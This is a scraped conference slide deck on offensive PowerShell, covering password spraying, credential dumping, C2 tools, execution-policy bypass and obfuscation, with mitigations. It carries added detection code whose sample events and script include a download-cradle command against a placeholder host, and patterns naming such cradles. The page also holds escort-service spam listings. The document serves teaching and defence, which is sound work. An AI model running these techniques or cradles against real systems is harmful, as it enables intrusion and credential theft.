FROM P0W3R TO SH3LL
ArthurPaixão_
PS C:>
PS C:> whoami.ps1_
• Arthur Paixão
• Red Team Security Specialist – C6 Bank
• Information Security - UNIFG
• Analysis Systems Development – UNIBRATEC
• Made in Recife #Oxem? #TuVisse?
• Security Research at #RTFM
PS C:> Powershell.exe
KEEP CALM
AND
LEARN POWERSHELL
PS C:> overview.ps1_
Why use PowerShell?
• Native on Windows
• .NET Framework
• Easy to learn
• Execute code in memory
• Command-line shell and script
• PowerShell ISE
PS C:> syntax-overview.ps1_
Registry:
• Poweliks
• Kovter (mshta or rundll + ActiveXObject)
File:
• .ps1
• .vbs
• .bat
• Scheduled task
Macros:
• Word
• Excel
Remotely:
• PowerShell Remoting
• PsExec
• WMI
PS C:> syntax-overview.ps1_
String: "abc", "123", "abc123"
Integer: 1,2,3,4,5
Boolean: $True, $False
Variable: $url, $qualquercoisa
PS C:> syntax-overview.ps1_
OBJECTS
• Properties
• Methods
ARRAYS
$list = "From", "Power", "To", "Shell"
$list[0]   # From
$list[1]   # Power
$list[2]   # To
$list[3]   # Shell
"$list"    # From Power To Shell
CMDLETS
• Always in a "verb-noun" format
• get-process
• get-eventlog
• write-host
• set-clipboard
PS C:> syntax-overview.ps1_
Basic CmdLets
PowerShell      PowerShell Alias    CMD            *nix
Get-ChildItem   ls, gci, dir        dir            ls
Copy-Item       cp, copy, cpi       copy           cp
Move-Item       move, mv, mi        move           mv
Select-String   sls                 find, findstr  grep
Get-Help        man, help           help           man
Get-Content     cat, gc, type       type           cat
PS C:> syntax-overview.ps1_
• New- : Creates a new resource
• Set- : Modifies an existing resource
• Get- : Retrieves an existing resource
• Read- : Gets information from a source, such as a file
• Find- : Used to look for an object
• Search- : Used to create a reference to a resource
• Start- : (asynchronous) Begins an operation, such as starting a process
• Invoke- : (synchronous) Performs an operation, such as running a command
PS C:> syntax-overview.ps1_
Get-Help
• Default output isn't really useful
• Get-Help ls -ex
• Get-Help ls -Full
Get-Command
• Very useful for finding cmdlets
• Get-Command Get-Help
• Get-Command Set-Acl
PS C:> get-ExecutionPolicy.ps1_
Execution Policy != Security Policy
PS C:> Invoke-BypassExecutionPolicy.ps1_
• Runme.ps1 contains:
  Write-Host "My voice is my passport, verify me."
PS C:> Powershell.exe
RED TEAM != BLUE TEAM
PS C:> Get-Help-RedTeam.ps1_
• PowerShell is what the admins use to manage their infrastructure;
• Standard on Windows 7 and up;
• Microsoft is pushing more and more tasks into PowerShell;
• PowerShell can be used in every part of the attack lifecycle;
• Access to entire .NET and WMI frameworks;
• Lots of very interesting offensive projects going on;
PS C:> Get-Help-BlueTeam.ps1_
• It’s what the bad guys (RedTeams) are using;
• There’s some really cool DFIR stuff going on with Powershell;
• Module Logging (v3);
• Script Block Logging (v5);
• Full Transcription Logging (v2, improved in v5);
• Prevent and monitor downgrade attacks;
• Monitor and alert on certain strings/commands in command line arguments for powershell.exe:
  • -EncodedCommand
  • (New-Object Net.WebClient).DownloadString
PS C:> Get-Attack-Scenario.ps1
ATT&CK += PENTESTING PHASES
PS C:> Get-Attack-Scenario.ps1_
Reconnaissance
Scanning
Gaining Access
Maintaining Access
Covering Tracks
Reporting
Scanning += Remote Attacks
PPP – Phishing PowerShell Payloads
Command and Control
Privilege Escalation
Network Exploitation += Domain Exploitation
Post Exploitation
PS C:> Get-Attack.ps1
SCANNING += REMOTE ATTACKS
PS C:> PSNmap.ps1_
• Linux nmap for PowerShell (almost).
• Ping sweeps and scans a network for specified open ports.
• Can also perform DNS lookups.
• Author(s)
• @joakimbs
• https://www.powershellgallery.com/packages/PSnmap/1.2
PS C:> PowerMeta.ps1_
• Discover publicly available files
• Extract Metadata from them
• Can provide information about:
• The internal username schema
• System names
• Domain info
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/PowerMeta
(Screenshot of PowerMeta output: Full Names, Possible Username)
PS C:> OWAAttackFlow.ps1_
Starting with nothing and 100% remote:
1. Reconnaissance
2. OWA Target Acquisition
3. Internal Domain Enumeration
4. Username Contention Discovery
5. Username Enumeration
6. Password Spraying
7. Acquire Global Address List
8. More Password Spraying
9. 2FA Bypass to Search Email
Congratulations, now you're a H4ck3R!!!
PS C:> MailSniper.ps1_
• Enumerate users/domain
• Password spray OWA/EWS
• Get Global Address List
• Search email for certain terms
• Passwords
• Find VPN info
• Reset 2FA keys or add new device
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/MailSniper
PS C:> Get-Attack.ps1
PPP – PHISHING POWERSHELL PAYLOADS
PS C:> PowerShell-Empire.ps1_
• PowerShell post-exploitation agent
• Aims to provide a rapidly extensible platform to integrate offensive/defensive PowerShell work
• Many capabilities:
  • Stagers/payloads, lateral movement, persistence, etc.
• Author(s):
• Will Schroeder (@harmj0y)
• Justin Warner (@sixdub)
• Matt Nelson (@enigma0x3)
• www.powershellempire.com
PS C:> LuckyStrike.ps1_
• PowerShell-based generator of malicious .doc and .xls documents;
• All payloads are saved into a database for easy retrieval & embedding into a new or existing document;
• A menu-driven PowerShell script that uses a SQLite database to store your payloads, code block dependencies, and working sessions in order to generate malicious documents.
• Author(s):
• Jason Lang (@curi0usJack)
• https://github.com/curi0usJack/luckystrike
PS C:> Get-Attack.ps1
COMMAND AND CONTROL
PS C:> Invoke-C&C.ps1_
• Powercat – PowerShell version of Netcat;
  • Author(s):
  • Mick Douglas (@besimorhino), Luke Baggett & Jesse Davis (@secabstraction)
  • https://github.com/secabstraction/PowerCat
• Invoke-PowerShellIcmp – C2 channel over ICMP echoes and replies;
  • Author(s):
  • Nikhil Mittal (@samratashok)
  • https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
• Dnscat2-PowerShell – C2 channel over DNS requests;
  • Author(s):
  • Ron Bowes (@iagox86)
  • https://github.com/lukebaggett/dnscat2-powershell
PS C:> Get-Attack.ps1
PRIVILEGE ESCALATION
PS C:> PowerUp.ps1_
• Performs a number of local privilege escalation checks
• Checks for:
  • Unquoted service paths
  • Unattended install files
  • Service permissions
• Author(s):
• Will Schroeder (@harmj0y)
• https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
PS C:> PowerUpSQL.ps1_
• SQL Server discovery
• Audit weak configurations
• Perform privilege escalation to obtain SA privileges
• Find sensitive data at scale
• Attack functions:
  • Invoke-SQLDumpInfo
  • Invoke-SQLAudit
  • Invoke-SQLEscalatePriv
• Author(s):
  • Scott Sutherland (@_nullbind)
• https://github.com/NetSPI/PowerUpSQL
PS C:> Get-Attack.ps1
DOMAIN EXPLOITATION
PS C:> Get-GPPPassword.ps1_
• Finds any passwords of accounts set by GPP
• Usually the first thing I check
• Almost always find an admin password here
• Author(s):
  • Chris Campbell (@obscuresec)
  • https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
PS C:> BloodHound.ps1_
• Enumerates/gathers:
  • Local admins group on all systems
  • Active user sessions on each system
  • Group membership information
  • Domain trusts info
• Finds a path to domain admin
• Author(s):
  • Andrew Robbins (@_wald0), Will Schroeder (@harmj0y) and Rohan Vazarkar (@CptJesus)
  • https://github.com/BloodHoundAD/BloodHound
  • https://github.com/SadProcessor/SomeStuff/blob/master/BloodHoundw64_LTI.ps1 [Windows Edition]
PS C:> Find-LocalAdminAccess.ps1_
• Finds a system on the network your user is a local admin of;
• Author(s):
  • Will Schroeder (@harmj0y)
  • https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PS C:> DomainPasswordSpray.ps1_
• Tool for password spraying all domain users
• Common scenario:
  • Domain locks out accounts after a certain number of failed logins
  • Can't brute force
• Solution:
  • Try a number of passwords less than the domain lockout policy against EVERY account in the domain
• Author(s):
  • Beau Bullock (@dafthack)
  • https://github.com/dafthack/DomainPasswordSpray
PS C:> Get-Attack.ps1
POST EXPLOITATION
PS C:> Invoke-Mimikatz.ps1_
• Dump cleartext credentials
• Avoids writing to disk
• Could sneakily dump creds from LSASS dumps from other systems
• Author(s):
  • Joe Bialek (@JosephBialek)
  • Benjamin Delpy (@gentilkiwi)
  • https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
PS C:> Invoke-ShareFinder.ps1_
• Sensitive files on shares?
• ShareFinder, then FileFinder
• FileFinder will find files with the following strings in their title:
  • '*pass*', '*sensitive*', '*admin*', '*secret*', '*login*', '*unattend*.xml', '*.vmdk', '*creds*', or '*credential*'
• Author(s):
  • Will Schroeder (@harmj0y)
PS C:> Invoke-Fr0mP0werT0Sh3ll.ps1
F#CK REPETITION!
PS C:> Get-P0werTricks.ps1_
• PowerShell Without PowerShell
• Execution Policy Bypass
• Obfuscation
• Payloads
• CheatTools
PS C:> PowerOps.exe_
• C# application that has many PowerShell scripts built in:
• PowerSploit
• Nishang
• GPPPassword
• Empire
• PowerCat
• Author(s):
• Rui Reis (@fdiskyou)
• https://github.com/fdiskyou/PowerOPS
PS C:> PowerShdll.ps1_
• Runs PowerShell with DLLs only. Does not require access to powershell.exe as it uses the PowerShell automation DLLs.
• Requirements:
  • .NET v3.5 for DLL mode.
  • .NET v2.0 for EXE mode.
• https://github.com/p3nt4/PowerShdll
(Screenshots of DLL mode and EXE mode usage)
PS C:> PowerLessShell.py_
• PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
• To add another layer of crap, the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary.
• You can provide the -knownprocess switch to use a known Windows process name instead of renaming MsBuild.exe to something random.
• https://github.com/Mr-Un1k0d3r/PowerLessShell
PS C:> Get-P0werTricks.ps1_
PowerShell Without PowerShell | Execution Policy Bypass | Obfuscation | Payloads | CheatTools
PS C:> Invoke-BypassExecutionPolicy.ps1_
• Paste the Script into an Interactive PowerShell Console:
• Use the Command Switch:
PS C:> Invoke-BypassExecutionPolicy.ps1_
• Use the Invoke-Command Command:
• Use the Invoke-Expression Command:
PS C:> Invoke-BypassExecutionPolicy.ps1_
• Set the ExecutionPolicy for the CurrentUser scope via the Registry
• https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
• https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-5.1
PS C:> Get-P0werTricks.ps1_
PowerShell Without PowerShell | Execution Policy Bypass | Obfuscation | Payloads | CheatTools
PS C:> S3t-0+'B'+fu$C4t|0n.ps1_
• Command line args are what most monitoring tools alert on when powershell.exe is run
• 'LeT'+'s'+'ob'+'FusCa'+'te'
• Encode, concatenate, reorder, etc.
• Author(s):
  • Daniel Bohannon (@danielbohannon)
  • https://github.com/danielbohannon/Invoke-Obfuscation
PS C:> ISESteroids.ps1_
• ISESteroids 2.5.1.0 now ships with a PowerShell obfuscator that can scramble your code and make it hard to reverse-engineer;
• To obfuscate a script, simply load a script and choose Tools/Obfuscate;
• A dialog lets you set the level of obfuscation;
• http://www.powertheshell.com/powershell-obfuscator/
PS C:> Get-P0werTricks.ps1_
PowerShell Without PowerShell | Execution Policy Bypass | Obfuscation | Payloads | CheatTools
PS C:> Nishang.ps1_
• Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.
• Nishang is useful during all phases of penetration testing.
• ActiveDirectory
• Antak - the Webshell
• Backdoor
• Bypass
• Clients
• Escalation
• MITM
• Pivot
• https://github.com/samratashok/nishang
PS C:> PowerSploit.ps1_
• PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
  • Recon / CodeExecution
  • ScriptModification
  • Persistence
  • AntivirusBypass
  • Exfiltration
  • Mayhem =)
  • PrivEsc
• https://github.com/PowerShellMafia/PowerSploit
PS C:> PS>Attack.ps1_
• PS>Attack combines some of the best projects in the infosec PowerShell community into a self-contained custom PowerShell console.
• It's designed to make it easy to use PowerShell offensively and to evade antivirus and incident response teams.
• Contains over 100 commands for privilege escalation, recon and data exfiltration. It does this by including the following modules and commands:
  • PowerSploit
  • Nishang
  • Powercat
  • Inveigh
  • Invoke-TheHash
• https://github.com/jaredhaight/PSAttack
PS C:> Get-Mitigation.ps1
SURPRISE, YOU’RE BUSTED!
DO YOU REALLY?
PS C:> Get-Mitigation.ps1_
• Disable cmd.exe, PowerShell.exe and PowerShell_ISE.exe (Possible bypass!)
• Use application whitelisting (Possible bypass!)
• Use Sysmon to monitor and alert on System.Management.Automation.dll being loaded (Possible bypass!)
• Could possibly disable the csc.exe compilation tool (Dangerous!)
• Remove PowerShell v2 and install PowerShell v5
• Constrained Language Mode:
  PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
  (set this way it applies only to the current session; enforce it durably with an AppLocker or WDAC policy)
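Detection logic for the command-line indicators on the Blue Team slide and for the Sysmon check above, as an added example that is not part of the original deck: it runs over constructed Sysmon-style events (Event ID 1 process creation, Event ID 7 image load), decodes -EncodedCommand payloads for the analyst, flags the -Version 2 downgrade, and flags System.Management.Automation.dll loaded by a host other than powershell.exe. The event dicts, paths and URL are constructed for the example; real telemetry would come from the Microsoft-Windows-Sysmon/Operational channel or a SIEM.

```python
"""Detection helpers for the PowerShell indicators named on the slides.

Added example, not part of the original deck.  Two checks:
  1. powershell.exe command lines carrying -EncodedCommand,
     (New-Object Net.WebClient).DownloadString, or a -Version 2 downgrade;
  2. System.Management.Automation.dll loaded by a process other than a
     normal PowerShell host ("PowerShell without PowerShell").
Events are constructed dicts shaped after Sysmon Event ID 1 (process
create) and Event ID 7 (image loaded).
"""
import base64
import binascii
import re
from typing import Optional

CMDLINE_INDICATORS = {
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    "encoded_command": re.compile(
        r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})"),
    # the download cradle named on the Blue Team slide
    "download_string": re.compile(r"(?i)Net\.WebClient\)?\s*\.DownloadString"),
    # forcing the v2 engine sidesteps v5 Script Block Logging
    "version_downgrade": re.compile(r"(?i)(?<!\S)-v(?:ersion)?\s+2(?:\.0)?(?!\S)"),
}

# Binaries legitimately expected to host the PowerShell engine.
EXPECTED_PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent/invalid."""
    match = CMDLINE_INDICATORS["encoded_command"].search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16le")  # powershell.exe expects UTF-16LE
    except (binascii.Error, UnicodeDecodeError):
        return None


def check_process_create(event: dict) -> list:
    """Names of indicators found on a PowerShell host's command line."""
    if basename(event.get("Image", "")) not in EXPECTED_PS_HOSTS:
        return []
    cmdline = event.get("CommandLine", "")
    return [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmdline)]


def check_image_load(event: dict) -> Optional[str]:
    """Flag the PowerShell engine DLL being loaded by an unexpected host."""
    if basename(event.get("ImageLoaded", "")) != "system.management.automation.dll":
        return None
    host = basename(event.get("Image", ""))
    if host in EXPECTED_PS_HOSTS:
        return None
    return f"automation_dll_in_{host}"


def scan(events: list) -> list:
    """Run both checks; return one alert dict per suspicious event."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            hits = check_process_create(ev)
            if hits:
                alert = {"event": ev, "indicators": hits}
                decoded = decode_encoded_command(ev.get("CommandLine", ""))
                if decoded is not None:
                    alert["decoded"] = decoded
                alerts.append(alert)
        elif ev.get("EventID") == 7:
            hit = check_image_load(ev)
            if hit:
                alerts.append({"event": ev, "indicators": [hit]})
    return alerts


# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
AUTOMATION_DLL = r"C:\constructed\path\System.Management.Automation.dll"
SAMPLE_COMMAND = "Write-Host 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS,
     "CommandLine": f"powershell.exe -NoP -W Hidden -EncodedCommand {SAMPLE_B64}"},
    {"EventID": 1, "Image": PS,
     "CommandLine": "powershell.exe -Command (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x.ps1')"},
    {"EventID": 1, "Image": PS, "CommandLine": "powershell.exe -Version 2 -Command Get-Process"},
    {"EventID": 1, "Image": PS, "CommandLine": "powershell.exe -Command Get-Process"},
    {"EventID": 7, "Image": MSBUILD, "ImageLoaded": AUTOMATION_DLL},
    {"EventID": 7, "Image": PS, "ImageLoaded": AUTOMATION_DLL},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["indicators"], alert.get("decoded", ""))
```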
PS C:> Get-Mitigation.ps1_
• Add Power to your PowerShell (@techmentorevents): https://goo.gl/fPCiJn
• PowerScripts (@WiredPulse): https://github.com/WiredPulse/PowerShell
• PoSh-R2 (@WiredPulse): https://github.com/WiredPulse/PoSh-R2
• DeepBlueCLI (@sans-blue-team): https://github.com/sans-blue-team/DeepBlueCLI
• Kansa (@davehull): https://github.com/davehull/Kansa
• PowerShellArsenal (@MattGraeber): https://github.com/mattifestation/PowerShellArsenal
THAT’S ALL FOLKS!
Suggestions? Questions?
Job portal: C6BANK.GUPY.IO
PS C:> Invoke-References.ps1_
• https://github.com/PowerShellMafia/PowerSploit/tree/dev/
• https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
• https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b
• https://github.com/davehull/Kansa
• https://github.com/Invoke-IR/Uproot
• https://github.com/mattifestation/PowerShellArsenal
• https://github.com/mattifestation/PSReflect
• https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
• https://pt.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
• http://lockboxx.blogspot.com.br/2016/03/powershell-for-pentesters-course.html
• https://media.blackhat.com/eu-13/briefings/Mittal/bh-eu-13-powershell-for-penetration-mittal-slides.pdf
• https://www.psattack.com/presentations/get-help-an-intro-to-powershell-and-how-to-use-it-for-evil/
• https://pt.slideshare.net/harmj0y/catch-me-if-you-can-powershell-red-vs-blue
• https://pt.slideshare.net/harmj0y/building-an-empire-with-powershell
• https://www.youtube.com/watch?v=uE8IAxM_BhE

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

PowerShell Post-Exploitation Techniques

  • 2. PS C:> whoami.ps1_ • Arthur Paixão • Red Team Security Specialist – C6 Bank • Information Security - UNIFG • Analysis Systems Development – UNIBRATEC • Made in Recife #Oxem? #TuVisse? • Security Research at #RTFM
  • 3. PS C:> Powershell.exe KEEP CALM AND LEARN POWERSHELL
  • 4. PS C:> overview.ps1_ Why use Powershell? Native on Windows .NET Framework Easy to learn Execute code in memory Command-line Shell and Script PowerShell ISE
  • 5. PS C:> syntax-overview.ps1_ Poweliks Kovter (mshta or rundll + ActiveXObject) Registry: .ps1 .vbs .bat Scheduled task File: Word Excel Macros: PowerShell Remoting PsExec WMI Remotely:
  • 7. PS C:> syntax-overview.ps1_ OBJECTS Properties Methods ARRAYS $list = “From”, “Power”, “To”, “Shell” $list[0] $list[1] $list[2] $list[3] “From Power To Shell” CMDLETS Always in a “verb-noun” format get-process get-eventlog write-host set-clipboard
  • 8. PS C:> syntax-overview.ps1_ Basic CmdLets (PowerShell / PowerShell alias / CMD / *nix): Get-ChildItem / ls, gci, dir / dir / ls • Copy-Item / cp, copy, cpi / copy / cp • Move-Item / move, mv, mi / move / mv • Select-String / sls / find, findstr / grep • Get-Help / man, help / help / man • Get-Content / cat, gc, type / type / cat
  • 9. PS C:> syntax-overview.ps1_ • Creates a new resource New • Modifies an existing resource Set- • Retrieves an existing resource Get- • Gets information from a source, such as a file Read- • Used to look for an object Find- • Used to create a reference to a resource Search- • (asynchronous) begin an operation, such as starting a process Start- • (synchronous) perform an operation such as running a command Invoke-
  • 10. PS C:> syntax-overview.ps1_ Get-Help • Default output isn’t really useful • Get-Help ls -ex • Get-Help ls -Full • Get-Command • Very useful for finding cmdlets • Get-Command Get-Help • Get-Command Set-Acl
  • 12. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Runme.ps1 • Write-Host "My voice is my passport, verify me."
  • 13. PS C:> Powershell.exe RED TEAM != BLUE TEAM
  • 14. PS C:> Get-Help-RedTeam.ps1_ • PowerShell is what the admins use to manage their infrastructure; • Standard on Windows 7 and up; • Microsoft is pushing more and more tasks into PowerShell; • PowerShell can be used in every part of the attack lifecycle; • Access to entire .NET and WMI frameworks; • Lots of very interesting offensive projects going on;
  • 15. PS C:> Get-Help-BlueTeam.ps1_ • It’s what the bad guys (RedTeams) are using; • There’s some really cool DFIR stuff going on with PowerShell; • Module Logging (v3); • Script Block Logging (v5); • Full Transcription Logging (v2, improved in v5); • Preventing and monitoring downgrade attacks; • Monitor and alert on certain strings/commands in command line arguments for powershell.exe: • -EncodedCommand • (New-Object Net.WebClient).DownloadString
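The monitoring bullet above (alert on -EncodedCommand and DownloadString in powershell.exe arguments) as an added example, not code from the slides: a triage function that decodes the UTF-16LE base64 argument the way powershell.exe does and matches the decoded script against a constructed pattern list, plus a reader for Sysmon process-creation events. The pattern list, the sample command line and the function names are assumptions.

```powershell
# Added example (not from the slides): triage for the "alert on -EncodedCommand /
# DownloadString in powershell.exe arguments" point. Pattern list and sample command
# line are constructed here; the Sysmon log name is the standard one.

# Strings worth alerting on once the command line has been decoded.
$SuspiciousPatterns = @(
    'DownloadString', 'DownloadFile', 'Net\.WebClient',
    'Invoke-Expression', '\bIEX\b', 'FromBase64String'
)

function Get-EncodedCommandPayload {
    # Returns the script hidden behind -EncodedCommand, or $null when there is none.
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of the switch: -e, -ec, -enc, -EncodedCommand
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    try {
        # The argument is base64 of UTF-16LE text, which is why UTF-8 decoding yields junk.
        $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
        return [Text.Encoding]::Unicode.GetString($bytes)
    } catch {
        return $null   # malformed base64: nothing to decode, but the switch alone is still a signal
    }
}

function Test-PowerShellCommandLine {
    # Decodes the command line if needed and reports which suspicious patterns it hits.
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = Get-EncodedCommandPayload -CommandLine $CommandLine
    $text = if ($decoded) { $decoded } else { $CommandLine }
    $hits = @($SuspiciousPatterns | Where-Object { $text -match $_ })
    [pscustomobject]@{
        Encoded    = [bool]$decoded
        Decoded    = $decoded
        Hits       = $hits
        Suspicious = [bool]$decoded -or ($hits.Count -gt 0)
    }
}

function Find-SuspiciousPowerShellLaunch {
    # Pulls recent Sysmon process-creation events (ID 1) and triages the PowerShell ones.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ([xml]$_.ToXml()).Event.EventData.Data
            $cmd  = ($data | Where-Object Name -eq 'CommandLine').'#text'
            if ($cmd -match '(?i)(powershell(_ise)?|pwsh)\.exe') {
                $result = Test-PowerShellCommandLine -CommandLine $cmd
                if ($result.Suspicious) {
                    $result | Add-Member -NotePropertyName Time -NotePropertyValue $_.TimeCreated -PassThru
                }
            }
        }
}

# Constructed sample: encode a download cradle the same way powershell.exe expects it,
# then triage the resulting command line (host is the reserved example.invalid).
$sampleScript = '(New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")'
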